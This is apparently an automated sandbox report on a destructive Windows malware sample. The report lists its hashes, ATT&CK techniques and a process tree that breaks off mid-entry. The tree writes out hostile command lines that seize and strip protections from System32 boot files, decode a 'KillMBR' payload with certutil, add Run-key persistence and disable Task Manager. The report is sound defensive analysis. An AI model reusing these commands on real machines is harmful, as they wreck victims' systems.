690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408

Analysis

max time kernel
149s
max time network
129s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
18-11-2024 17:21

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

ADZP 20 Complex.exe
Size

112KB
MD5

81a7a946456f1f6dae4715b1feb72ed0
SHA1

af83b938017efd53f95671adc0c6d2aa1088d38e
SHA256

690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408
SHA512

a1ec5c6b1ebb014aa60d0242e147ebbbadd2aff2a0e653b99f440f8d25bb01ee49cddcf6ad608c0adc8a5efc784ff2c949036b447da2912ccc6e684c2cc0e692
SSDEEP

3072:O7DhdC6kzWypvaQ0FxyNTBfHdIyEGfvBN+:OBlkZvaF4NTB/yyEGfvBQ

Score

8^/10

defense_evasion discovery evasion exploit upx

Malware Config

Signatures

Modifies Windows Firewall 2 TTPs 5 IoCs

evasion

Windows Service

T1543.003

Disable or Modify System Firewall

T1562.004

pid	Process
4412	netsh.exe
5904	netsh.exe
7484	netsh.exe
7320	netsh.exe
4992	netsh.exe

Possible privilege escalation attempt 64 IoCs

exploit

pid	Process
7136	icacls.exe
1736	takeown.exe
2164	icacls.exe
7072	takeown.exe
4852	takeown.exe
3124	takeown.exe
6940	icacls.exe
7704	takeown.exe
956	takeown.exe
1212	icacls.exe
444	icacls.exe
328	takeown.exe
4532	icacls.exe
3128	icacls.exe
7716	takeown.exe
3396	icacls.exe
4308	takeown.exe
8060	takeown.exe
8080	takeown.exe
9424	icacls.exe
4864	icacls.exe
3844	icacls.exe
3844	takeown.exe
7804	icacls.exe
4708	takeown.exe
2928	takeown.exe
3616	takeown.exe
2156	icacls.exe
6928	takeown.exe
2100	icacls.exe
10876	takeown.exe
1688	takeown.exe
2876	takeown.exe
5552	icacls.exe
1384	icacls.exe
1540	icacls.exe
1428	icacls.exe
5104	icacls.exe
7656	takeown.exe
6900	takeown.exe
8064	takeown.exe
4052	icacls.exe
5100	takeown.exe
4796	takeown.exe
9948	takeown.exe
548	icacls.exe
5408	takeown.exe
7980	icacls.exe
2320	takeown.exe
7488	icacls.exe
8156	icacls.exe
2384	takeown.exe
1816	takeown.exe
3132	icacls.exe
7224	icacls.exe
7332	icacls.exe
4272	takeown.exe
4852	takeown.exe
8052	takeown.exe
8120	icacls.exe
112	takeown.exe
6224	takeown.exe
4376	takeown.exe
8168	takeown.exe

Drops startup file 2 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ADZP 20 Complex.exe	cmd.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ADZP 20 Complex.exe	cmd.exe

Executes dropped EXE 1 IoCs

pid	Process
3664	Tasksvc.exe

Modifies file permissions 1 TTPs 64 IoCs

discovery

File and Directory Permissions Modification

T1222

pid	Process
9712	icacls.exe
1736	takeown.exe
2164	icacls.exe
3524	icacls.exe
4796	takeown.exe
7684	icacls.exe
8052	takeown.exe
5268	takeown.exe
10876	takeown.exe
7136	icacls.exe
4852	takeown.exe
6232	takeown.exe
4864	icacls.exe
2004	icacls.exe
8080	takeown.exe
7180	takeown.exe
11564	takeown.exe
2644	takeown.exe
6232	takeown.exe
1212	takeown.exe
2024	icacls.exe
4788	takeown.exe
7224	icacls.exe
7804	icacls.exe
3844	icacls.exe
1428	icacls.exe
3132	icacls.exe
5412	takeown.exe
7716	takeown.exe
6836	icacls.exe
5408	takeown.exe
4516	takeown.exe
2876	takeown.exe
1212	icacls.exe
3396	icacls.exe
7484	icacls.exe
7332	icacls.exe
4852	takeown.exe
2024	takeown.exe
8060	takeown.exe
2928	takeown.exe
7980	icacls.exe
8128	icacls.exe
6224	takeown.exe
1616	takeown.exe
3616	takeown.exe
6928	takeown.exe
5104	icacls.exe
5552	icacls.exe
3036	icacls.exe
4376	takeown.exe
7804	takeown.exe
7224	takeown.exe
2384	takeown.exe
8120	icacls.exe
7488	icacls.exe
956	takeown.exe
112	takeown.exe
1816	takeown.exe
3456	icacls.exe
4896	takeown.exe
8064	takeown.exe
7624	takeown.exe
2156	icacls.exe

Deobfuscate/Decode Files or Information 1 TTPs 1 IoCs

Payload decoded via CertUtil.

defense_evasion

Deobfuscate/Decode Files or Information

T1140

pid	Process
492	certutil.exe

File and Directory Permissions Modification: Windows File and Directory Permissions Modification 1 TTPs
defense_evasion

Windows File and Directory Permissions Modification
T1222.001

Modifies boot configuration data using bcdedit 5 IoCs

pid	Process
4616	bcdedit.exe
7212	bcdedit.exe
7320	bcdedit.exe
7676	bcdedit.exe
8888	bcdedit.exe

Drops autorun.inf file 1 TTPs 1 IoCs

Malware can abuse Windows Autorun to spread further via attached volumes.

Replication Through Removable Media

T1091

description	ioc	Process
File opened for modification	C:\Users\Admin\AppData\Local\Temp\Autorun.inf	cmd.exe

Drops file in System32 directory 3 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\hal.dll	attrib.exe
File opened for modification	C:\Windows\System32\winresume.exe	attrib.exe
File opened for modification	C:\Windows\System32\winload.exe	attrib.exe

UPX packed file 3 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/files/0x0008000000023cbe-262.dat	upx
behavioral2/memory/3664-263-0x0000000000400000-0x000000000040E000-memory.dmp	upx
behavioral2/memory/3664-360-0x0000000000400000-0x000000000040E000-memory.dmp	upx

System Location Discovery: System Language Discovery 1 TTPs 2 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ADZP 20 Complex.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Tasksvc.exe

Gathers network information 2 TTPs 13 IoCs

Uses commandline utility to view network configuration.

System Information Discovery

T1082

Command and Scripting Interpreter

T1059

pid	Process
6200	ipconfig.exe
6608	ipconfig.exe
5804	ipconfig.exe
5200	ipconfig.exe
8052	ipconfig.exe
556	ipconfig.exe
2656	ipconfig.exe
4692	ipconfig.exe
4728	ipconfig.exe
7204	ipconfig.exe
5148	ipconfig.exe
7152	ipconfig.exe
8316	ipconfig.exe

Modifies registry key 1 TTPs 25 IoCs

Modify Registry

T1112

pid	Process
6860	reg.exe
452	reg.exe
8188	reg.exe
7708	reg.exe
4268	reg.exe
4336	reg.exe
488	reg.exe
3792	reg.exe
7072	reg.exe
7256	reg.exe
8016	reg.exe
4376	reg.exe
8096	reg.exe
5084	reg.exe
8848	reg.exe
5796	reg.exe
7680	reg.exe
4036	reg.exe
2276	reg.exe
7944	reg.exe
3716	reg.exe
8160	reg.exe
408	reg.exe
6824	reg.exe
6476	reg.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

description	pid	Process
Token: SeTakeOwnershipPrivilege	328	takeown.exe
Token: SeTakeOwnershipPrivilege	1736	takeown.exe
Token: SeTakeOwnershipPrivilege	2384	takeown.exe
Token: SeTakeOwnershipPrivilege	5104	takeown.exe

Suspicious use of WriteProcessMemory 35 IoCs

description	pid	Process	procid_target
PID 2016 wrote to memory of 2848	2016	ADZP 20 Complex.exe	84
PID 2016 wrote to memory of 2848	2016	ADZP 20 Complex.exe	84
PID 2848 wrote to memory of 1976	2848	cmd.exe	85
PID 2848 wrote to memory of 1976	2848	cmd.exe	85
PID 2848 wrote to memory of 328	2848	cmd.exe	87
PID 2848 wrote to memory of 328	2848	cmd.exe	87
PID 2848 wrote to memory of 4008	2848	cmd.exe	88
PID 2848 wrote to memory of 4008	2848	cmd.exe	88
PID 2848 wrote to memory of 1964	2848	cmd.exe	89
PID 2848 wrote to memory of 1964	2848	cmd.exe	89
PID 2848 wrote to memory of 1736	2848	cmd.exe	90
PID 2848 wrote to memory of 1736	2848	cmd.exe	90
PID 1976 wrote to memory of 2384	1976	cmd.exe	91
PID 1976 wrote to memory of 2384	1976	cmd.exe	91
PID 2848 wrote to memory of 1540	2848	cmd.exe	92
PID 2848 wrote to memory of 1540	2848	cmd.exe	92
PID 2848 wrote to memory of 1880	2848	cmd.exe	93
PID 2848 wrote to memory of 1880	2848	cmd.exe	93
PID 2848 wrote to memory of 5104	2848	cmd.exe	94
PID 2848 wrote to memory of 5104	2848	cmd.exe	94
PID 2848 wrote to memory of 4864	2848	cmd.exe	95
PID 2848 wrote to memory of 4864	2848	cmd.exe	95
PID 2848 wrote to memory of 3276	2848	cmd.exe	96
PID 2848 wrote to memory of 3276	2848	cmd.exe	96
PID 2848 wrote to memory of 492	2848	cmd.exe	97
PID 2848 wrote to memory of 492	2848	cmd.exe	97
PID 2848 wrote to memory of 3664	2848	cmd.exe	98
PID 2848 wrote to memory of 3664	2848	cmd.exe	98
PID 2848 wrote to memory of 3664	2848	cmd.exe	98
PID 2848 wrote to memory of 3364	2848	cmd.exe	99
PID 2848 wrote to memory of 3364	2848	cmd.exe	99
PID 2848 wrote to memory of 4512	2848	cmd.exe	101
PID 2848 wrote to memory of 4512	2848	cmd.exe	101
PID 2848 wrote to memory of 3460	2848	cmd.exe	102
PID 2848 wrote to memory of 3460	2848	cmd.exe	102

Views/modifies file attributes 1 TTPs 59 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
2080	attrib.exe
8148	attrib.exe
7676	attrib.exe
8884	attrib.exe
2164	attrib.exe
5040	attrib.exe
5552	attrib.exe
7980	attrib.exe
2320	attrib.exe
6748	attrib.exe
4532	attrib.exe
4484	attrib.exe
2820	attrib.exe
400	attrib.exe
6920	attrib.exe
2928	attrib.exe
7944	attrib.exe
8016	attrib.exe
5472	attrib.exe
2296	attrib.exe
4636	attrib.exe
7816	attrib.exe
2616	attrib.exe
10308	attrib.exe
1880	attrib.exe
4728	attrib.exe
4780	attrib.exe
6300	attrib.exe
8204	attrib.exe
10096	attrib.exe
7152	attrib.exe
1452	attrib.exe
1212	attrib.exe
7128	attrib.exe
1964	attrib.exe
5052	attrib.exe
6968	attrib.exe
7664	attrib.exe
9212	attrib.exe
8844	attrib.exe
3276	attrib.exe
7764	attrib.exe
7732	attrib.exe
8440	attrib.exe
11460	attrib.exe
560	attrib.exe
7136	attrib.exe
404	attrib.exe
5652	attrib.exe
3848	attrib.exe
8440	attrib.exe
2588	attrib.exe
9228	attrib.exe
4636	attrib.exe
3456	attrib.exe
5072	attrib.exe
7332	attrib.exe
3716	attrib.exe
7360	attrib.exe

C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
"C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2016
- C:\Windows\system32\cmd.exe
  "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\DADF.tmp\DAE0.tmp\DAE1.bat "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe""
  2⤵
  - Drops startup file
  - Drops autorun.inf file
  - Suspicious use of WriteProcessMemory
  PID:2848
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /K Taskdl.bat
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1976
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\System32" /r
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      Suspicious use of AdjustPrivilegeToken
      PID:2384
- - C:\Windows\system32\takeown.exe
    takeown /f "C:\Windows\System32\winresume.exe"
    3⤵
    - Possible privilege escalation attempt
    - Suspicious use of AdjustPrivilegeToken
    PID:328
- - C:\Windows\system32\icacls.exe
    icacls "C:\Windows\System32\winresume.exe" /reset /c /q
    3⤵
    PID:4008
- - C:\Windows\system32\attrib.exe
    attrib -r -a -s -h "C:\Windows\System32\winresume.exe"
    3⤵
    - Drops file in System32 directory
    - Views/modifies file attributes
    PID:1964
- - C:\Windows\system32\takeown.exe
    takeown /f "C:\Windows\System32\winload.exe"
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:1736
- - C:\Windows\system32\icacls.exe
    icacls "C:\Windows\System32\winload.exe" /reset /c /q
    3⤵
    - Possible privilege escalation attempt
    PID:1540
- - C:\Windows\system32\attrib.exe
    attrib -r -a -s -h "C:\Windows\System32\winload.exe"
    3⤵
    - Drops file in System32 directory
    - Views/modifies file attributes
    PID:1880
- - C:\Windows\system32\takeown.exe
    takeown /f "C:\Windows\System32\hal.dll"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:5104
- - C:\Windows\system32\icacls.exe
    icacls "C:\Windows\System32\hal.dll" /reset /c /q
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:4864
- - C:\Windows\system32\attrib.exe
    attrib -r -a -s -h "C:\Windows\System32\hal.dll"
    3⤵
    - Drops file in System32 directory
    - Views/modifies file attributes
    PID:3276
- - C:\Windows\system32\certutil.exe
    certutil -decode "C:\Users\Admin\AppData\Local\Temp\KillMBR.Shingapi.tmp" "Tasksvc.exe"
    3⤵
    - Deobfuscate/Decode Files or Information
    PID:492
- - C:\Users\Admin\AppData\Local\Temp\Tasksvc.exe
    Tasksvc.exe
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:3664
- - C:\Windows\system32\wscript.exe
    WScript Informacion.vbs
    3⤵
    PID:3364
- - C:\Windows\system32\rundll32.exe
    rundll32 user32.dll, SetCursorPos
    3⤵
    PID:4512
- - C:\Windows\system32\rundll32.exe
    rundll32 user32.dll, SwapMouseButton
    3⤵
    PID:3460
- - C:\Windows\system32\ipconfig.exe
    ipconfig /release
    3⤵
    - Gathers network information
    PID:556
- - C:\Windows\system32\reg.exe
    reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v EthernetKill /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\EthernetKiller.cmd" /f
    3⤵
    PID:2688
- - C:\Windows\system32\attrib.exe
    attrib -r -a -s -h *.*
    3⤵
    - Views/modifies file attributes
    PID:560
- - C:\Windows\system32\wscript.exe
    WScript ErrorCritico.vbs
    3⤵
    PID:3576
- - C:\Windows\system32\wscript.exe
    WScript Advertencia.vbs
    3⤵
    PID:2988
- - C:\Windows\system32\wscript.exe
    WScript ErrorCritico.vbs
    3⤵
    PID:1544
- - C:\Windows\system32\wscript.exe
    WScript Advertencia.vbs
    3⤵
    PID:1776
- - C:\Windows\system32\wscript.exe
    WScript ErrorCritico.vbs
    3⤵
    PID:4932
- - C:\Windows\system32\wscript.exe
    WScript Advertencia.vbs
    3⤵
    PID:3872
- - C:\Windows\system32\wscript.exe
    WScript ErrorCritico.vbs
    3⤵
    PID:4924
- - C:\Windows\system32\wscript.exe
    WScript Advertencia.vbs
    3⤵
    PID:4868
- - C:\Windows\system32\wscript.exe
    WScript ErrorCritico.vbs
    3⤵
    PID:4276
- - C:\Windows\system32\wscript.exe
    WScript Advertencia.vbs
    3⤵
    PID:4284
- - C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
    "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
    3⤵
    PID:4348
  - - C:\Windows\system32\cmd.exe
      "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\E733.tmp\E734.tmp\E735.bat "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe""
      4⤵
      PID:2088
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Taskdl.bat
        5⤵
        
        PID:3736
      - C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32" /r
        6⤵
        
        PID:5068
    - - C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32\winresume.exe"
        5⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:956
    - - C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\winresume.exe" /reset /c /q
        5⤵
        Possible privilege escalation attempt
        
        PID:4532
    - - C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h "C:\Windows\System32\winresume.exe"
        5⤵
        Views/modifies file attributes
        
        PID:5052
    - - C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32\winload.exe"
        5⤵
        Modifies file permissions
        
        PID:4896
    - - C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\winload.exe" /reset /c /q
        5⤵
        Possible privilege escalation attempt
        
        PID:3128
    - - C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h "C:\Windows\System32\winload.exe"
        5⤵
        Views/modifies file attributes
        
        PID:5072
    - - C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32\hal.dll"
        5⤵
        Modifies file permissions
        
        PID:2644
    - - C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\hal.dll" /reset /c /q
        5⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:2164
    - - C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h "C:\Windows\System32\hal.dll"
        5⤵
        Views/modifies file attributes
        
        PID:5040
    - - C:\Windows\system32\wscript.exe
        
        WScript Informacion.vbs
        5⤵
        
        PID:4616
    - - C:\Windows\system32\rundll32.exe
        
        rundll32 user32.dll, SetCursorPos
        5⤵
        
        PID:2876
    - - C:\Windows\system32\rundll32.exe
        
        rundll32 user32.dll, SwapMouseButton
        5⤵
        
        PID:4352
    - - C:\Windows\system32\ipconfig.exe
        
        ipconfig /release
        5⤵
        Gathers network information
        
        PID:4692
    - - C:\Windows\system32\reg.exe
        
        reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v EthernetKill /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\EthernetKiller.cmd" /f
        5⤵
        
        PID:32
    - - C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h *.*
        5⤵
        Views/modifies file attributes
        
        PID:2296
    - - C:\Windows\system32\wscript.exe
        
        WScript ErrorCritico.vbs
        5⤵
        
        PID:1428
    - - C:\Windows\system32\wscript.exe
        
        WScript Advertencia.vbs
        5⤵
        
        PID:2876
    - - C:\Windows\system32\wscript.exe
        
        WScript ErrorCritico.vbs
        5⤵
        
        PID:100
    - - C:\Windows\system32\wscript.exe
        
        WScript Advertencia.vbs
        5⤵
        
        PID:2164
    - - C:\Windows\system32\wscript.exe
        
        WScript ErrorCritico.vbs
        5⤵
        
        PID:4956
    - - C:\Windows\system32\wscript.exe
        
        WScript Advertencia.vbs
        5⤵
        
        PID:2692
    - - C:\Windows\system32\wscript.exe
        
        WScript ErrorCritico.vbs
        5⤵
        
        PID:2212
    - - C:\Windows\system32\wscript.exe
        
        WScript Advertencia.vbs
        5⤵
        
        PID:3068
    - - C:\Windows\system32\wscript.exe
        
        WScript ErrorCritico.vbs
        5⤵
        
        PID:4780
    - - C:\Windows\system32\wscript.exe
        
        WScript Advertencia.vbs
        5⤵
        
        PID:4692
    - - C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
        5⤵
        
        PID:4352
      - C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\4CD3.tmp\4CD4.tmp\4CD5.bat "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe""
        6⤵
        
        PID:5720
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Taskdl.bat
        7⤵
        
        PID:7216
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32" /r
        8⤵
        Possible privilege escalation attempt
        
        PID:6900
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32\winresume.exe"
        7⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:6224
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\winresume.exe" /reset /c /q
        7⤵
        Modifies file permissions
        
        PID:8128
        
        C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h "C:\Windows\System32\winresume.exe"
        7⤵
        Views/modifies file attributes
        
        PID:4636
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32\winload.exe"
        7⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:4376
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\winload.exe" /reset /c /q
        7⤵
        Possible privilege escalation attempt
        
        PID:4052
        
        C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h "C:\Windows\System32\winload.exe"
        7⤵
        Views/modifies file attributes
        
        PID:6968
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32\hal.dll"
        7⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:4852
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\hal.dll" /reset /c /q
        7⤵
        Possible privilege escalation attempt
        
        PID:8156
        
        C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h "C:\Windows\System32\hal.dll"
        7⤵
        Views/modifies file attributes
        
        PID:404
        
        C:\Windows\system32\wscript.exe
        
        WScript Informacion.vbs
        7⤵
        
        PID:3056
        
        C:\Windows\system32\rundll32.exe
        
        rundll32 user32.dll, SetCursorPos
        7⤵
        
        PID:3380
        
        C:\Windows\system32\rundll32.exe
        
        rundll32 user32.dll, SwapMouseButton
        7⤵
        
        PID:7052
        
        C:\Windows\system32\ipconfig.exe
        
        ipconfig /release
        7⤵
        Gathers network information
        
        PID:6200
        
        C:\Windows\system32\reg.exe
        
        reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v EthernetKill /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\EthernetKiller.cmd" /f
        7⤵
        
        PID:4832
        
        C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h *.*
        7⤵
        Views/modifies file attributes
        
        PID:5552
        
        C:\Windows\system32\wscript.exe
        
        WScript ErrorCritico.vbs
        7⤵
        
        PID:8048
        
        C:\Windows\system32\wscript.exe
        
        WScript Advertencia.vbs
        7⤵
        
        PID:7308
        
        C:\Windows\system32\wscript.exe
        
        WScript ErrorCritico.vbs
        7⤵
        
        PID:7136
        
        C:\Windows\system32\wscript.exe
        
        WScript Advertencia.vbs
        7⤵
        
        PID:5700
        
        C:\Windows\system32\wscript.exe
        
        WScript ErrorCritico.vbs
        7⤵
        
        PID:5192
        
        C:\Windows\system32\wscript.exe
        
        WScript Advertencia.vbs
        7⤵
        
        PID:5412
        
        C:\Windows\system32\wscript.exe
        
        WScript ErrorCritico.vbs
        7⤵
        
        PID:1528
        
        C:\Windows\system32\wscript.exe
        
        WScript Advertencia.vbs
        7⤵
        
        PID:7836
        
        C:\Windows\system32\wscript.exe
        
        WScript ErrorCritico.vbs
        7⤵
        
        PID:2040
        
        C:\Windows\system32\wscript.exe
        
        WScript Advertencia.vbs
        7⤵
        
        PID:1852
        
        C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
        7⤵
        
        PID:7980
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\4D99.tmp\4D9A.tmp\4D9B.bat "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe""
        8⤵
        
        PID:8352
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Taskdl.bat
        9⤵
        
        PID:2916
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32" /r
        10⤵
        Modifies file permissions
        
        PID:7624
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32\winresume.exe"
        9⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:8052
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\winresume.exe" /reset /c /q
        9⤵
        Modifies file permissions
        
        PID:6836
        
        C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h "C:\Windows\System32\winresume.exe"
        9⤵
        Views/modifies file attributes
        
        PID:2616
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32\winload.exe"
        9⤵
        
        PID:9032
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\winload.exe" /reset /c /q
        9⤵
        Possible privilege escalation attempt
        
        PID:1384
        
        C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h "C:\Windows\System32\winload.exe"
        9⤵
        Views/modifies file attributes
        
        PID:5652
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32\hal.dll"
        9⤵
        Possible privilege escalation attempt
        
        PID:4308
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\hal.dll" /reset /c /q
        9⤵
        Modifies file permissions
        
        PID:9712
        
        C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h "C:\Windows\System32\hal.dll"
        9⤵
        Views/modifies file attributes
        
        PID:10308
        
        C:\Windows\explorer.exe
        
        explorer.exe
        7⤵
        
        PID:6724
        
        C:\Windows\system32\notepad.exe
        
        notepad
        7⤵
        
        PID:8212
        
        C:\Windows\system32\calc.exe
        
        calc
        7⤵
        
        PID:8232
        
        C:\Windows\system32\mspaint.exe
        
        mspaint
        7⤵
        
        PID:8340
        
        C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
        7⤵
        
        PID:8592
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\5B93.tmp\5B94.tmp\5B95.bat "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe""
        8⤵
        
        PID:8708
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Taskdl.bat
        9⤵
        
        PID:3148
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32" /r
        10⤵
        
        PID:3240
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32\winresume.exe"
        9⤵
        Possible privilege escalation attempt
        
        PID:7656
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\winresume.exe" /reset /c /q
        9⤵
        Modifies file permissions
        
        PID:3036
        
        C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h "C:\Windows\System32\winresume.exe"
        9⤵
        Views/modifies file attributes
        
        PID:9228
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32\winload.exe"
        9⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:10876
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\winload.exe" /reset /c /q
        9⤵
        
        PID:5940
        
        C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h "C:\Windows\System32\winload.exe"
        9⤵
        Views/modifies file attributes
        
        PID:11460
        
        C:\Windows\explorer.exe
        
        explorer.exe
        7⤵
        
        PID:8652
        
        C:\Windows\system32\notepad.exe
        
        notepad
        7⤵
        
        PID:8796
        
        C:\Windows\system32\calc.exe
        
        calc
        7⤵
        
        PID:8868
        
        C:\Windows\system32\mspaint.exe
        
        mspaint
        7⤵
        
        PID:8920
        
        C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
        7⤵
        
        PID:9136
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\769D.tmp\769E.tmp\769F.bat "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe""
        8⤵
        
        PID:8348
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Taskdl.bat
        9⤵
        
        PID:8296
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32" /r
        10⤵
        Possible privilege escalation attempt
        
        PID:9948
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32\winresume.exe"
        9⤵
        Modifies file permissions
        
        PID:5268
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\winresume.exe" /reset /c /q
        9⤵
        Possible privilege escalation attempt
        
        PID:9424
        
        C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h "C:\Windows\System32\winresume.exe"
        9⤵
        Views/modifies file attributes
        
        PID:10096
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32\winload.exe"
        9⤵
        Modifies file permissions
        
        PID:11564
        
        C:\Windows\explorer.exe
        
        explorer.exe
        7⤵
        
        PID:9184
        
        C:\Windows\system32\notepad.exe
        
        notepad
        7⤵
        
        PID:8464
        
        C:\Windows\system32\calc.exe
        
        calc
        7⤵
        
        PID:8360
        
        C:\Windows\system32\mspaint.exe
        
        mspaint
        7⤵
        
        PID:7516
        
        C:\Windows\system32\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
        7⤵
        Modifies registry key
        
        PID:7708
        
        C:\Windows\system32\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableLockWorkstation /t REG_DWORD /d 1 /f
        7⤵
        Modifies registry key
        
        PID:8848
        
        C:\Windows\system32\reg.exe
        
